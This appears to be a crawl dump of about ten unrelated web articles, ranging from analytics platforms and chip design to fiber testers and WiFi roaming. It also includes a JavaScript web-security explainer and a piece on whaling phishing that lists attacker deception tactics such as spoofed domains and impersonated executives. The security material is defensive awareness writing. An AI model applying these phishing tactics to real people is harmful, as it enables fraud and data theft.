The problem with this is of course that consumers of self-service platforms are far more diverse than the providers of that capability. The personas amongst those who utilize self-service platforms include business analysts, hard-core programmers, data scientists, and business executives. Self-service means something different to each persona, and many of those meanings are diametrically opposed to one another. For the business analyst, self-service means being able to mash data and a SQL-like language into an intuitive set of steps to deliver insights. For the programmer, it means the ability to create their own scripts in their language of choice. For the data scientist, it means being able to intelligently mix and match state-of-the-art algorithms to understand underlying data patterns. For executives, it means interactively working with a few dashboards to fully understand the state of their business. Under these circumstances, how would a provider-centric self-service platform work? It wouldn't!

What Self-Service Analytics Platforms Should Include

Simply put, there are at least eight items that need to be considered by the purveyors of an analytic platform when providing self-service capabilities. Each of these topics can be explored further; however, when integrated thoughtfully into an analytics platform they are able to cater to the widest net of analytic professionals. More importantly, our quest to drive business outcomes in a self-service manner comes that much closer to being fulfilled. The capabilities are:
Collaboration: Analytics is a team sport. Never in our hands-on careers have we seen an analyst doing all their work and that's the end of their story. Typically, when analysts work alone, the things they are working on can be called science experiments. True collaboration comes when the analytic environment is structured in a manner where all participants speak in a common language with one another.
Data Catalog: Data catalogs provide a cross-organizational view of all the data sources and objects within those sources with a clear marking of definitions and hierarchies. A crisp catalog makes it easy for analysts to pick and choose the variables they use in analytics.
Security and Governance: In this day and age, what is the use of a data-driven practice that does not guarantee security? Especially in the context of collaboration, security becomes important to the business. We are not just referring to access privileges that are applied across the board, but instead a persona-based, sensible application of rules that ensure data fidelity, confidentiality, as well as context-based access.
Pre-built analytic functions across multiple genres (e.g., machine learning, sentiment analysis, graph, statistics) make it easier for citizen data scientists to quickly invoke functions in a nested manner to render insights. The alternative is to code these in a non-repeatable manner, therefore wasting time and resources.

Integrated BI Tools: Not all solutions have their own built-in BI tools. However, when an analytics platform integrates well with a BI tool it makes it easier for users to quickly deliver compelling visualizations and dashboards that, in turn, make the operationalization of business insights a given.

Analytic workflow tools, such as KNIME, include a graphical interface that enables users to create data flows, execute selected analysis steps, and review the results, models and interactive views. This, again, caters to a group of analytic personas that want the rigor of analysis without having to deal with the unstructured scripting environments that others may prefer.

Gone are the days where one data source claims to speak to some existential truth. Nowadays, we connect to many enterprise data warehouses, data lakes, cloud data pods, flat files, and unstructured data repositories, to name a few. To do analytics separately in each of these siloed systems and then attempt to piece together the outcomes is a disaster of apocalyptic proportions (I'm only slightly exaggerating). What we need is the ability to connect to various sources at will so that we can complement analytics with all data that the business needs and generates.

Flexible UX/UI Design: Underpinning a strong focus on self-service analytics is an absolute focus on usability and experience. A design that is customized based on user personas exponentially increases analytics adoption. Adoption that is instead focused on simply giving anyone access to the platform without regard to their skills and aptitudes is likely to fail. In the worst-case scenario, a bad user experience turns off the entire organization from a path of intelligent decision making.
<urn:uuid:871498a5-2b82-4537-9f1b-5a63525db325>
CC-MAIN-2022-40
https://www.teradata.com.cn/Blogs/The-Eight-Functions-You-Should-Consider-When-Choosing-a-Self-Service-Analytics-Platform
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00469.warc.gz
en
0.944237
1,111
2.65625
3
A partnership between Texas Instruments and the Massachusetts Institute of Technology has produced a proof-of-concept microchip architecture that is 10 times more efficient than current technologies. The design — which was presented on Tuesday at the International Solid State Circuits Conference — uses a redesigned memory and logic architecture to allow the chip to operate at a much lower voltage level, which allows devices such as cell phones to operate with a longer battery life. While consumers likely won’t see any new devices for at least five years, researchers say the chip could help build long-lasting cell phones and implantable medical devices that use body heat to power its systems. The research, funded in part by the U.S. Defense Advanced Research Projects Agency (DARPA), could also lead to the development of military sensor networks that are scattered across the battlefield. “These design techniques show great potential for TI future low-power IC (integrated circuit) products and applications including wireless terminals, RFID, battery-operated instrumentation, sensor networks, medical electronics and many others,” said Dennis Buss, chief scientist at Texas Instruments. How the Chip Was Done The chip’s development required the researchers to re-imagine how the circuits on the microchip were powered. That was no simple task considering that microchip architecture was designed to work at one volt, while the new chip is powered at 0.3 volts. To accomplish that, the designers built a DC-to-DC converter directly on the chip, then integrated the memory and logic systems with the converter. The end result will be a more efficiently powered microchip, which — if the design can be cheaply manufactured — leapfrogs several generations of innovation, said Gideon Intrater, vice president of solutions architecture for Mountain View, Calif.-based MIPS Technologies, a semiconductor design firm. “In the past, with each transition from one process generation to the next, power consumption was reduced by a factor of about three times,” Intrater told TechNewsWorld. “These process transitions occurred roughly every two to three years.” The new microchip is still in the design phase, so it’s difficult to predict the types of devices that might hit the market in the near future; however, the chip would have the capability of extending the current battery life of devices already on the market. The increased power, though, would also likely lead to smaller — and more powerful — devices that could run longer and more efficiently between charges. “It is clear that any battery-operated device could benefit from the longer battery life and smaller battery size,” Intrater said. “These products could include traditional mobile consumer devices like cell phones, PDAs and media players, as well as medical devices.”
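A rough back-of-the-envelope calculation helps explain why dropping the supply voltage can yield roughly a tenfold efficiency gain. The assumption that dynamic switching power dominates is mine, not the article's, and real gains also depend on leakage and on the lower clock speeds that low-voltage operation typically requires.

```latex
% Back-of-the-envelope only; assumes dynamic switching power dominates.
% Dynamic power in CMOS logic scales as P \propto C V^2 f.
% Dropping the supply voltage from 1 V to 0.3 V at fixed C and f gives:
\[
\frac{P_{0.3\,\mathrm{V}}}{P_{1\,\mathrm{V}}} \approx \left(\frac{0.3}{1.0}\right)^{2} = 0.09
\]
% i.e. roughly a tenfold reduction, consistent with the reported
% "10 times more efficient" figure.
```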
<urn:uuid:46d0c07e-75ec-4463-8dcb-b392380bed7c>
CC-MAIN-2022-40
https://www.ecommercetimes.com/story/new-chip-uses-10-times-less-power-61554.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334802.16/warc/CC-MAIN-20220926051040-20220926081040-00669.warc.gz
en
0.962689
579
3.171875
3
Parents can now check their child’s spine for possible signs of scoliosis with the new app SpineScreen developed by Shriners Hospitals for Children. Available for free on the App Store and Google Play, SpineScreen detects curves as the cell phone is moved along a child’s back, giving parents a quick, informal way to regularly monitor their child’s spine. Scoliosis is an abnormal curvature of the spine that can restrict movement and in some cases lead to other serious medical conditions. It is most commonly diagnosed between 10 and 15 years of age, when children grow rapidly. Some cases, however, can go undetected. At this point in a child’s life, fewer vaccinations are required, so they may see a doctor less often. Since early detection is crucial, Shriners Hospitals physicians encourage parents to download the free SpineScreen app and check kids as part of their back-to-school routine each year. “Because there is often no known cause, monitoring for scoliosis is an important part of a child’s ongoing health care,” says Amer Samdani, M.D., chief of surgery for Shriners Hospitals for Children — Philadelphia. He adds, “It is a progressive condition, so early detection is key. At Shriners Hospitals, our care ranges from routine monitoring to some of the most advanced treatments for scoliosis. The earlier we see a child, the more options we have available.” Shriners Hospitals created the app as part of a broader initiative to highlight the importance of regular screenings and to educate parents on the signs of scoliosis and treatment options. “With doctors and staff who are global leaders in the treatment of scoliosis care, parents turn to Shriners Hospitals for Children because they know their children will receive the best care possible,” said Gary Bergenske, chairman of the Board of Directors for Shriners Hospitals for Children. “Since scoliosis usually requires ongoing medical treatment throughout childhood, our commitment to provide care regardless of the families’ ability to pay is a huge relief to parents.”
<urn:uuid:14ebf9da-a882-48ba-8bad-e2bad1d36811>
CC-MAIN-2022-40
https://www.e-channelnews.com/new-spinescreen-app-helps-parents-detect-signs-of-scoliosis-in-kids/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335286.15/warc/CC-MAIN-20220928212030-20220929002030-00669.warc.gz
en
0.949772
451
2.734375
3
A large number of commercial services are nowadays using personal data of their users, such as their location, purchase transactions, payment transactions, social security numbers, activity data, authentication data, social interactions, browsing history, and more. These data are commonly used to deliver personalized applications in a variety of application sectors, including retail, finance, healthcare and social media. Nevertheless, the extensive collection and use of personal data raises important privacy and data protection concerns. For instance, consumers are interested in preventing the use of their data for purposes other than the ones specified in the data collection process. Likewise, they would like to have fine grained control over their data through controlling when and with whom to share data. Citizens and businesses are in several cases reluctant to share their data as means of mitigating the above risks. This leads to “data silos” i.e. data analytics processes and data intensive applications that are addressed to the data producers only and which do not provide opportunities for repurposing and reusing data across different applications. Much as this reluctance is a privacy protection measure, it is also a set-back to innovation. The breaking of the data silos and the ability to reuse datasets across data-intensive applications could unveil significant opportunities for innovative applications. As a prominent example, by combining data from different financial organizations, it is possible to create more accurate user profile for highly personalized applications. As another example, the integration of healthcare data that are collected by different people, devices and applications can facilitate the extraction of medical knowledge, thus opening new horizons to clinical research and observational studies. Therefore, it’s important to lower the data sharing barriers, through alleviating risks and offering data providers with incentives to share their data beyond a single application. One of the best ways to provide incentives for data sharing is to create a data market as a tool for connecting the demand (i.e. data buyers) with the supply side (i.e. data providers) based on secure and trustworthy data exchange mechanisms. In the scope of a data market, multiple providers are willing to share their data in exchange of some monetary or other incentive. At the same time, data buyers have the opportunity of accessing data from multiple providers at a specified cost. There are also technological measures that can encourage and facilitate data exchange, notably measures based on privacy enhancing and privacy awareness mechanisms. The latter aim at safeguarding the privacy of data providers at all times. One of the most prominent privacy enhancing mechanisms for data intensive applications, concerns the employment of privacy preserving analytics techniques. Privacy preserving analytics schemes aim at analyzing data from a source, without disclosing information about it and in a way that minimizes the risk of presenting the source’s data to malicious parties (e.g., enterprises that would like to exploit users’ personal data). In essence, privacy preserving analytics techniques enable application developers to analyze vast amounts of personal data, without however compromising the source data. 
In practice, this means that application developers and end users can see the outcomes of the analysis (e.g., the answers and results of a query) without disclosing information about the source data where this query was executed. When querying or analyzing data from a single source, there is a straightforward way of safeguarding the privacy of the source: moving the query to the data source, rather than moving the data to the analytics through the network. As long as the data remain on the data provider's own systems, they can be kept secure and private. Nevertheless, the tactic of moving the query to the data source cannot work in cases where data from multiple data providers need to be processed, which is a common and useful scenario in the scope of a data market. In such cases some data have to be moved outside the organization of the data provider, which makes them susceptible to eavesdropping and other forms of hacking. In order to alleviate the relevant privacy concerns, the data that are moved out of the organization can be encrypted. Furthermore, secure computing techniques can be employed in order to enable execution of queries on data that remain encrypted at all times. Secure computation solutions provide a means to query data without ever decrypting them, which offers a solution for cases where data owners would otherwise lose control of the data analytics process, typically when their data needs to be processed outside their organization. In particular, based on secure computation, data analyzers can obtain answers to a query without decrypting the source data, which permits data owners to retain control of their data at all times. Secure computing schemes are based on advanced mathematical and cryptographic formulations such as homomorphic encryption and secure multi-party computation (MPC). These secure computing schemes have been known to the research community for several decades. However, their practical applicability in real-life applications beyond research prototypes has been quite limited, mainly due to the poor performance of the corresponding implementations. This situation has changed during recent years, as the maturity and performance of secure computing frameworks have improved. This is clearly reflected in the emergence of start-up enterprises that offer cryptographic products and privacy preserving services based on secure computing techniques. As a prominent example, Unbound applies secure multi-party computation (MPC) in order to ensure that secrets such as cryptographic keys, credentials and private data are never processed in complete form. Likewise, Sepior leverages secure computing techniques to provide threshold key management solutions for blockchain, cryptocurrencies, and cloud service providers' infrastructures. There have also been remarkable academic projects on secure computing, such as MIT's Enigma project that offers a decentralized platform for secure computing based on blockchain technology. Beyond research efforts and start-ups, secure computing is nowadays integrated with several products of large IT providers. The practical applicability of secure computing is largely due to the emergence of specialized high-performance hardware. Nevertheless, practical deployments remain challenging for performance reasons. According to some benchmarks, homomorphic encryption is still up to a million times slower than conventional computation, which is the reason why secure computing techniques leverage specialized hardware mechanisms in modern CPUs such as Intel's Software Guard Extensions (SGX).
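To give a feel for how computation on hidden data can work, here is a minimal sketch of additive secret sharing, one of the simplest ideas behind secure multi-party computation. It is a toy for illustration only and is not the implementation used by Unbound, Sepior, Enigma or any other product named above; the salary figures and the three-party setup are invented.

```python
# Minimal, illustrative sketch of additive secret sharing: a sum is computed
# without any single party ever seeing another party's private value.
import secrets

PRIME = 2**61 - 1  # all arithmetic is done modulo a large prime

def share(value, n_parties):
    """Split `value` into n random shares that sum to `value` mod PRIME."""
    shares = [secrets.randbelow(PRIME) for _ in range(n_parties - 1)]
    shares.append((value - sum(shares)) % PRIME)
    return shares

def reconstruct(shares):
    """Recombine shares (or partial results) into the hidden value."""
    return sum(shares) % PRIME

# Three data providers each hold a private salary figure.
salaries = [52_000, 61_000, 47_000]
all_shares = [share(s, 3) for s in salaries]

# Each computing party i only ever sees one share from each provider...
partial_sums = [sum(provider_shares[i] for provider_shares in all_shares) % PRIME
                for i in range(3)]

# ...yet combining the partial sums yields the correct total salary bill.
print(reconstruct(partial_sums))                    # 160000
print(reconstruct(partial_sums) == sum(salaries))   # True
```

No individual share reveals anything about the salary it came from, yet the aggregate query ("what is the total?") is answered correctly, which is the property the article attributes to secure computation in general.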
In the coming years, we expect to see rising needs for privacy preserving processing of datasets, as part of the wave of BigData and Artificial Intelligence (AI) applications. Assuring end-users that their data remain encrypted at all times can lower the barriers of data sharing, while relaxing relevant privacy concerns. Secure computing can provide a great technical contribution in this forefront, especially as evolution in hardware and computing make it a viable alternative for privacy preserving analytics.
<urn:uuid:9caaefe9-15bc-416a-ae03-6cb6b06cf7d5>
CC-MAIN-2022-40
https://www.itexchangeweb.com/blog/enabling-ai-on-personal-data-with-privacy-preserving-analytics/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335286.15/warc/CC-MAIN-20220928212030-20220929002030-00669.warc.gz
en
0.926986
1,558
2.578125
3
A team of researchers at Carnegie Mellon University believe they have developed the first AI pilot that enables autonomous aircraft to navigate crowded airspace.

AI pilot could eventually pass the Turing Test

The artificial intelligence can safely avoid collisions, predict the intent of other aircraft, track aircraft and coordinate with their actions, and communicate over the radio with pilots and air traffic controllers. The researchers aim to develop the AI so the behaviors of their system will be indistinguishable from those of a human pilot. Jean Oh, an associate research professor at CMU's Robotics Institute (RI) and a part of the AI pilot team, stated, "We believe we could eventually pass the Turing Test," alluding to the test of an AI's capacity to demonstrate intelligent behavior comparable to a human. The AI employs both vision and natural language to convey its intent to other aircraft, whether piloted or not, and to engage with them as a human pilot would. Adopting this behavior allows it to navigate safely and in keeping with accepted social norms. Researchers trained the AI on data gathered at the Allegheny County Airport and the Pittsburgh-Butler Regional Airport, which included air traffic patterns, photographs of planes, and radio broadcasts, to achieve this implicit coordination. Similar to a human pilot, the AI employs six cameras and a computer vision system to identify surrounding planes. Its automatic voice recognition feature uses NLP methods to comprehend incoming radio transmissions and speak verbally with pilots and air traffic controllers. The development of autonomous aircraft will increase the possibilities for drones, air taxis, helicopters, and other aircraft to operate, often without a pilot at the controls, moving people and goods, inspecting infrastructure, treating fields to protect crops, and monitoring for poaching or deforestation. However, the area where these aircraft must fly is already congested with small aircraft, medical helicopters, and other traffic. The FAA and NASA have suggested segmenting this urban airspace into lanes or corridors with limitations on the times, types, and numbers of aircraft permitted to use them. This could lead to air traffic bottlenecks prohibiting essential aircraft, such as medical evacuation helicopters, from reaching their destinations. It would fundamentally alter how this airspace is now used and generally operated. The aerospace industry has faced challenges in developing an AI to handle the frequently congested and pilot-controlled lower-altitude traffic operating under visual flight rules (VFR), even though autopilot controls are common among commercial airliners and other aircraft operating at higher altitudes under instrument flight rules (IFR). The AI used by the team is built to interact with airplanes in VFR airspace with ease. "This is the first AI pilot that works in the current airspace. I don't see that airspace changing for UAVs. The UAVs will have to change for the airspace," explained Sebastian Scherer, an associate research professor in the RI and a member of the team. The AI pilot has done well in flight simulators, but it has not yet been tested on actual aircraft. The team set up two flight simulators to evaluate the AI. The AI controls one, while a person is in charge of the other, and both use the same airspace. Even if the pilot at the controls lacks experience, the AI can safely maneuver around the controlled aircraft. Commercially, AI could assist autonomous aircraft in carrying passengers and delivering products.
To reduce weight and protect themselves against a pilot shortage, delivery drones and air taxis would ideally not fly with a pilot on board. The project’s lead researcher, Jay Patrikar, a Ph.D. candidate at the RI, stated, “We need more pilots, and AI can help.”
<urn:uuid:c06a1684-ebee-426f-8826-173adc006052>
CC-MAIN-2022-40
https://dataconomy.com/2022/08/ai-pilot-could-navigate-crowded-airspace/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00669.warc.gz
en
0.939332
744
3.453125
3
Source Code Vulnerabilities

Unintended Script Execution

Exclusive Reliance on Client-Side Validation

Most organizations only ensure validation in users' browsers. Though this offers a certain level of security, hackers who use advanced techniques to send unverified data to servers can corrupt records and configurations.

Exposure of Session Data

Attackers leverage the power of client-side browser scripts to access all communication between the browser and the web application. This communication may include sensitive session data, such as user session IDs used for unauthorized access.

Unintentional User Activity

These vulnerabilities can be prevented by:
- Filtering and sanitizing user input
- Using effective response headers
- Encoding data before output generation
- Utilizing Content Security Policies
- Running an XSS scanner regularly before every release

Cross-Site Request Forgery (CSRF or XSRF)

CSRF is a widespread security vulnerability in which threat actors manipulate legitimate users into submitting malicious requests to web applications they are lured into visiting. When the web application fails to differentiate between valid user requests and forged requests, attackers can execute malicious actions under the guise of legitimate end users. CSRF attacks can be prevented by:
- Implementing secure random tokens
- Logging off unused web applications
- Disallowing automatic password entry by browsers
- Securing session credentials
- Running a CSRF scanner regularly before every release

Server-Side Injection

This mechanism injects and executes malicious or arbitrary code on a web application's server when user inputs are not sanitized and filtered. Attackers typically look for functions that parse user-generated data without proper validation in order to get insecure scripts executed by the server. Server-side injection attacks are typically prevented by properly validating and filtering user inputs.

Client-Side Logic Attacks

Client-side logic attacks can be prevented by avoiding operations with sensitive security controls on the client side.
- Avoid evaluating user input: The eval() and new Function() constructs execute arguments passed in user input as JavaScript expressions. Because hackers can manipulate user input to run malicious scripts, it is recommended to avoid evaluating user input or parsing JSON data through these constructs.
- Enable TLS/SSL encryption: Encrypting data exchanged between servers and clients prevents attackers from intercepting or tampering with session data in transit.
- Secure API access: It is essential to assign tokens to each user accessing the web app through the API, enabling secure access.
- Set secure cookies: By marking cookies as secure, they are only transmitted over encrypted HTTPS connections, protecting them from interception.
- Define Content Security Policies: Content security policies ensure that attackers cannot inject malicious scripts into web applications to manipulate state changes.

Also, hire security professionals or embed continuous security by employing a security scanner and generating a vulnerability report before pushing new production changes. You can read about DevSecOps and SecDevOps in our individual blog posts (and yes, they are different things). The Zed Attack Proxy (ZAP) is an open-source web application security scanner that is part of the OWASP project. The tool uses a combination of AJAX spidering and fuzzing to expose potential vulnerabilities by sending the application into undesired states. ZAP encapsulates most AppSec features in a single, open-source, and easy-to-use platform that enables manual and automated security scans.
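A minimal sketch of what several of the mitigations above (escaping reflected input, a Content-Security-Policy header, and secure cookie flags) look like in practice is shown below. The article does not prescribe a framework; Flask is used here purely as an assumed example, and the route, cookie name, and policy values are invented.

```python
# Illustrative sketch only: Flask is an assumption, not something the article
# recommends; the route, cookie name and policy values are invented.
from flask import Flask, request, make_response
from markupsafe import escape

app = Flask(__name__)

@app.route("/greet")
def greet():
    # Escape user input before it is reflected back, so injected <script>
    # tags are rendered inert instead of executed (basic XSS mitigation).
    name = escape(request.args.get("name", "guest"))
    resp = make_response(f"<p>Hello, {name}</p>")

    # Content Security Policy: only allow resources and scripts from our origin.
    resp.headers["Content-Security-Policy"] = "default-src 'self'; script-src 'self'"

    # Secure cookie flags: HTTPS-only, not readable by client-side scripts,
    # and not sent on cross-site requests (helps against session theft / CSRF).
    resp.set_cookie("session_id", "opaque-token-value",
                    secure=True, httponly=True, samesite="Strict")
    return resp
```

Requesting /greet?name=<script>alert(1)</script> against this sketch returns the tag as harmless text rather than running it, and the cookie flags keep the session identifier out of reach of injected scripts.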
The Crashtest Security Suite is trusted by many software vendors and organizations globally to deploy safer web applications through vulnerability scanning and assessment. Start your 14-day trial with the suite to explore how Crashtest Security can help improve developer productivity and reduce security testing budgets.
<urn:uuid:de84b8b6-35b5-47e9-94b0-137aaf793ba0>
CC-MAIN-2022-40
https://crashtest-security.com/javascript-vulnerabilities/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336674.94/warc/CC-MAIN-20221001132802-20221001162802-00669.warc.gz
en
0.878819
1,923
2.96875
3
With every piece of new work or indeed any new experience we undertake in our lives we go through a process of learning. We may watch the task, repeat the task, read about the task – there are many different ways of learning how to do something and a thousand scholarly scientific textbooks that will tell you all about it. But why is this relevant to process? The answer is simple – the benefits of process are fundamentally based on the way humans learn. In a former life I was a commis chef. One day I was given a task to make the tomato concasse for one of the dishes. The chef showed me how to do it and I repeated it after him. “Good” said the Head Chef, and proceeded to give me a bucket of tomatoes to turn into concasse. So I started to make the concasse – I took the first tomato, chopped it in two, scooped out the seeds, pressed it flat, chopped the middle out and pressed it flat then diced the tomato. Half an hour later I felt the burning eye of the chef looking at my paltry pile of tomato concasse. “NO, NO, NO!” he said and proceeded to show me the error of my ways. “First chop all the tomatoes, then scoop out all the seeds, then press them all flat, then dice them ALL!” I didn’t realise it at the time but this was my first real-life lesson in the benefits of process. As I did each step in turn I found myself speeding up dramatically. The first few I did were slow as I got my technique right, but after that I was flying, and in no time I was finished my bucket of tomatoes and was feeling very pleased with myself (until I was given a bucket of potatoes!) What I had replicated was the concept of functional design – the same concept that was the basis of the industrial revolution. If I had, for example, a tomato concasse factory I would probably have a team that would put the tomatoes into buckets, another team to chop the tomatoes, another team to flatten the tomatoes, etc. When we split tasks into functions we break them down into simpler more easily understood parts.As they are simpler to understand the learning curve is shorter; workers can learn to do each task quickly and become very fast at doing the tasks whilst maintaining quality. Conversely if we have multiple tasks performed by one person the complexity of learning becomes greater and it is slower to complete the overall process – we introduce multiple learning curves within the process. I would also argue that when each learning curve is repeated simultaneously there is greater memory retention than when multiple learning curves exist. Back in 1776 a very canny Scotsman, Adam Smith talked about this exact phenomenon in his famous book, “The Wealth of Nations“. He talked about what he defined as the “Division of Labour” – what we call functions today – and he used the example of the making of metal pins to demonstrate the benefits of the division of labour: “Each person, therefore, making a tenth part of forty-eight thousand pins, might be considered as making four thousand eight hundred pins in a day. But if they had all wrought separately and independently, and without any of them having been educated to this peculiar business, they certainly could not each of them have made twenty, perhaps not one pin in a day” Adam Smith was right and it became the basis of how we do work today – functions designed to complete specific tasks. But as companies, products and marketplaces became more complex and segmented, so became the need to have more complex and specialised functions within organisations. 
As process people we are now all acutely aware of the challenges that this brings for organisations to manage the flow of work across these functional specialities. The division of labour and the specialisation of work functions provided a totally new way of working and had a major role in the industrial revolution – but it has now become both a blessing and a curse for organisations. Now and into the future the ability to manage processes across increasingly complex organisations will become imperative. This blog was originally published on The Process Ninja.
<urn:uuid:80414f4c-45c0-4d1d-8879-aa86968ac4bc>
CC-MAIN-2022-40
https://www.bpmleader.com/2012/01/17/process-learning-the-division-of-labour/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00669.warc.gz
en
0.975885
860
2.765625
3
An OTDR (Optical Time Domain Reflectometer) is a fiber optic tester for the characterization of optical networks that support telecommunications. The purpose of an OTDR is to detect, locate, and measure elements at any location on a fiber optic link. An OTDR needs access to only one end of the link and acts like a one-dimensional radar system. By providing a pictorial trace signature of the fibers under test, it makes it possible to get a graphical representation of the entire fiber optic link. An OTDR can be used to measure optical distance, including the locations of elements like splices, connectors, splitters, multiplexers and faults, as well as the end of the fiber. OTDRs can also test loss and Optical Return Loss (ORL)/reflectance, such as the loss of splices and connectors, the ORL of a link or section, the reflectance of connectors, and total fiber attenuation.

Not all OTDRs are made the same. There are various OTDR models available, addressing different test and measurement needs. The choice of an OTDR is based on your applications. By thinking through the following questions, you can get a rough idea of what kind of OTDR you need.
- What kind of networks will you be testing? LAN, metro, long haul?
- What fiber type will you be testing? Multimode or single-mode?
- What is the maximum distance you might have to test? 700 m, 25 km, 150 km?
- What kind of measurements will you perform? Construction (acceptance testing), troubleshooting, in-service?

Fiberstore offers you 7 factors to help you figure out which OTDR best fits your applications.
- Size and Weight: important if you have to climb up a cell tower or work inside a building.
- Display Size: 5″ should be the minimum requirement for a display size; OTDRs with smaller displays cost less but make OTDR trace analysis more difficult.
- Battery Life: an OTDR should be usable for a day in the field; 8 hours should be the minimum.
- Trace or Results Storage: 128 MB should be the minimum internal memory, with options for external storage such as USB memory sticks.
- Bluetooth and/or WiFi Wireless Technology: wireless connectivity enables easy export of test results to PCs/laptops/tablets.
- Modularity/Upgradability: a modular/upgradable platform will more easily match the evolution of your test needs; this may be more costly at the time of purchase but is less expensive in the long term.
- Post-Processing Software Availability: although it is possible to edit and document your fibers from the test instrument, it is much easier and more convenient to analyze and document test results using post-processing software.

Before selecting an OTDR, consider the applications that the instrument will be used for and check the OTDR's specifications to ensure that they are suited to your applications. Fiberstore OTDRs are available for a variety of fiber types and wavelengths, including single-mode fiber, multimode fiber, 1310 nm, 1550 nm, and 1625 nm. It also supplies OTDRs from well-known brands, such as the JDSU MTS series, EXFO, and the YOKOGAWA AQ series. You can find the OTDR that best fits your applications at Fiberstore.
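The "one-dimensional radar" analogy above can be made concrete with the standard distance relation an OTDR applies. This is a generic textbook formula, not something specific to Fiberstore's or any listed vendor's instruments, and the example numbers are invented.

```latex
% Generic OTDR distance relation (not vendor-specific): the instrument measures
% the round-trip time t of a reflected pulse and converts it to distance using
% the speed of light c and the fiber's group refractive index n.
\[
d = \frac{c\, t}{2 n}
\]
% Example: with n \approx 1.468 and a reflection arriving after t = 10\,\mu s,
\[
d = \frac{(3\times10^{8}\,\mathrm{m/s})(10\times10^{-6}\,\mathrm{s})}{2 \times 1.468}
  \approx 1.02\,\mathrm{km},
\]
% which is how an OTDR places a splice, connector or break on the link
% from a single-ended measurement.
```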
<urn:uuid:ea6e82bd-8b83-4432-a5d6-0773a4cf9037>
CC-MAIN-2022-40
https://www.fiber-optic-cable-sale.com/7-factors-to-consider-before-selecting-an-otdr.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00669.warc.gz
en
0.894682
694
3.0625
3
Roaming is a client-side decision in 802.11 WiFi. Client devices listen for beacon frames or send probe requests to discover APs advertising the preferred SSID. The client's driver uses the received signal strength of beacons or probe responses to make decisions on whether to change APs or remain connected to the current AP. In terms of roaming, there are several points to keep in mind:
- Wireless clients may not roam until the received signal dips below a specified proprietary threshold on the wireless NIC. In this instance, client 1 associated to AP 1 will not roam to AP 2 despite AP 2's probe response reflecting a higher RSSI value.
- Attenuation due to free space path loss in an open environment is typically easier to predict. However, indoors, RF scattering and reflection can create sources of multipath interference. While physical proximity between client and AP has a large impact on RSSI, it is not the only factor.
- If a client device is having trouble roaming (e.g., hanging on to an AP too long), it may be desirable to toggle the device's roaming aggressiveness to a higher setting. The screenshot below shows where this parameter can be set on a Windows 7 laptop.
Note: Figure 1 is only an example of where the roaming aggressiveness settings are on a client machine; the settings may be located elsewhere or managed in a different fashion depending on the NIC in use.
Note: Apple products do not have roaming aggressiveness settings.
Figure 1: Roaming aggressiveness settings for a Windows 7 laptop using an Intel Centrino wireless card. Navigate to the device manager under the control panel settings
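The client-side decision described above can be sketched as a simple hysteresis rule. The -70 dBm threshold and 6 dB margin below are invented for illustration; actual NIC drivers use their own proprietary values and additional inputs.

```python
# Illustrative sketch of a client-side roaming decision. The threshold and
# hysteresis margin are invented; real drivers use proprietary values.
def should_roam(current_rssi_dbm, candidate_rssi_dbm,
                roam_threshold_dbm=-70, hysteresis_db=6):
    """Return True if the client should move to the candidate AP."""
    # Stay put while the current AP is still above the roaming threshold,
    # even if a candidate AP is reporting a stronger signal.
    if current_rssi_dbm >= roam_threshold_dbm:
        return False
    # Only roam if the candidate is meaningfully stronger; the hysteresis
    # margin avoids ping-ponging between two APs with similar signal levels.
    return candidate_rssi_dbm >= current_rssi_dbm + hysteresis_db

print(should_roam(-65, -55))  # False: current AP still strong enough
print(should_roam(-75, -72))  # False: candidate not enough of an improvement
print(should_roam(-75, -60))  # True: below threshold and candidate much stronger
```

The first call mirrors the scenario in the text: the client stays on AP 1 even though AP 2 reports a higher RSSI, because its current signal has not yet dropped below the driver's threshold. Raising "roaming aggressiveness" effectively raises that threshold.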
<urn:uuid:5e6e3d56-d9e9-4955-ba9a-fd801ce60e39>
CC-MAIN-2022-40
https://documentation.meraki.com/MR/WiFi_Basics_and_Best_Practices/Client_roaming_and_connectivity_decisions_explained
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00069.warc.gz
en
0.908366
331
2.640625
3
“Whaling” phishing fraud attacks target the C-suite of a company which creates high risk of extremely sensitive, mission-critical data being stolen and exposed. Fortunately, protecting the organization from these attacks is possible. Whaling phishing is a type of phishing attack targeting larger, high-value targets, which is why it's called "Whaling." Attackers themselves often pretend to be C-suite executives in emails to colleagues asking for personal or company information. What Exactly is Phishing? Phishing is when a bad actor pretends to be someone else through either email or text message in order to trick the recipient into leaking their information, or installing malware. These attacks in general have risen sharply over the years and are one of the biggest threats to network security. Attackers impersonate well-known brands, and in the case of whaling, pretend to be a trusted leader inside an organization in order to trick recipients into clicking on malicious links or sending sensitive information. Attackers use a number of different methods to hide their true identity when phishing. Some of those methods include: - Sending emails from a spoofed domain - Sending emails from a lookalike domain - Using stolen brand images in the email to convey trust - Using stolen email signatures to look legitimate - Hiding malicious embedded links inside innocent looking URLs - Using scare tactics and urgency to get recipients to act - Pretending to be a key figure within an organization to get recipients to act While there are plenty of methods attackers use to phish unsuspecting victims, there are equally just as many strategies companies can use to implement phishing defenses. Let’s take a look at the different types of phishing attacks, and how they compare to whaling. Phishing vs. Whaling - What’s the Difference? Simply put, whaling is a more targeted form of spear phishing that exploits the trust of recipients by pretending to be a known authority figure within a company. For example, attackers will pretend to be a C-level staff member in an organization, and use that authority to pressure employees and colleagues to take a specific action. These actions can range from sending over financial statements, clicking on fraudulent links, or even wiring money to unknown accounts. Many phishing attacks are done indiscriminately and are sent to thousands of different people at once. Email scams are a numbers game, so attackers will send emails in bulk knowing only a small percent will fall for the scam. Whaling, however, takes the complete opposite approach, and focuses on researching particularly lucrative targets like enterprise organizations. Attacks are well planned and often use scraped or stolen information in order to make the fake message appear more 